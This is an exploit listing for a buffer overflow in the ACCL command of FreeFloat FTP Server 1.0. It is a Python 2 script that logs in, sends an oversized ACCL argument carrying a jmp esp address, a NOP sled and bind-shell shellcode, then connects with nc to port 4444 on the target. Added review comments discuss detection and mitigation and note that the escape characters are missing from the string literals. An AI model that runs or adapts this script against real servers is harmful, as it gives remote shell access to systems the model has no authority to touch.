FreeFloat FTP Server 1.0 ACCL Buffer Overflow
Posted on 20 July 2011
#!/usr/bin/python
#
#[+]Exploit Title: FreeFloat FTP Server ACCL Buffer Overflow Exploit
#[+]Date: 19 62011
#[+]Author: mortis
#[+]Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
#[+]Version: 1.00
#[+]Tested On: Windows XP SP3 English
#[+]CVE: N/A
#
# Review notes (defensive reading of this listing):
# - Shape of the traffic: one TCP connection to the FTP control port, a
#   USER and a PASS command, then a single ACCL command whose argument is
#   246 filler characters, a packed 4-byte little-endian address and the
#   `sled` and `sc` strings. The server replies are read and discarded.
# - NOTE(review): as captured on this page the string literals contain no
#   backslash escapes, so the listing is not byte-accurate to the original
#   post; do not derive byte signatures from it.
# - Detection: an FTP command line several hundred bytes long is anomalous
#   on the control channel. Alert on or drop commands whose argument exceeds
#   a sane bound. The author's comment and the final `nc` call both refer
#   to TCP port 4444 on the target, so an unexpected listener or inbound
#   connection on that port of an FTP host is a follow-on indicator.
# - Mitigation: the header lists no CVE and no fixed version; presumably
#   there is no patched release (verify). Treat hosts running this server
#   as candidates for replacement or network isolation. The layout relies
#   on a hard-coded address that the author annotates for Windows XP SP3;
#   ASLR and DEP are designed to break exactly that assumption.
#
from socket import *
import sys, struct, os

# Build the oversized ACCL argument and send it to host:port.
# host is passed to socket.connect(), port must already be an int.
# Returns nothing; no reply from the server is inspected.
def sploit(host, port):
    #open listener shell on port 4444
    # Author's payload string, assembled across 25 literals.
    sc = "xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66"
    sc += "x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6"
    sc += "x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa"
    sc += "x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f"
    sc += "x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb"
    sc += "x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba"
    sc += "x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb"
    sc += "xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc"
    sc += "xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61"
    sc += "x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70"
    sc += "x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44"
    sc += "x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7"
    sc += "x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69"
    sc += "xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9"
    sc += "xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0"
    sc += "x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3"
    sc += "x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7"
    sc += "x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0"
    sc += "xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67"
    sc += "x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1"
    sc += "xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0"
    sc += "x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88"
    sc += "x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d"
    sc += "xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95"
    sc += "x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2"
    # 246 filler characters precede the address. Presumably that is the
    # distance to a saved return address in the ACCL handler (confirm
    # against the binary).
    padding = "A"*246
    sled = "x90"*20
    # Fixed address packed as a 32-bit little-endian value. It is tied to
    # the platform named in the author's comment.
    jmpesp = struct.pack('<L',0x7C874413) #jmp esp winxp3
    # This local shadows the enclosing function's name inside its own body.
    sploit = padding + jmpesp + sled + sc
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((host,port))
    # Each recv() result is thrown away, so neither the banner nor the
    # login replies are checked before the next command is sent.
    s.recv(1024)
    s.send("USER test ")
    s.recv(1024)
    s.send("PASS test ")
    s.recv(1024)
    # The whole oversized argument goes out in a single ACCL command.
    s.send("ACCL "+sploit+" ")
    s.close()

if __name__ == '__main__':
    # Requires two positional arguments: target host and port.
    if (len(sys.argv) < 3):
        # Python 2 print statement; the file does not parse under Python 3.
        print " Usage: freefloat.py <host> <port> "
        sys.exit()
    else:
        host = sys.argv[1]
        port = sys.argv[2]
        sploit(host, int(port))
        # host is concatenated unquoted into a shell command line, so shell
        # metacharacters in argv[1] would be interpreted by the shell.
        # Passing an argument list to subprocess avoids that.
        os.system("nc " + host + " 4444")
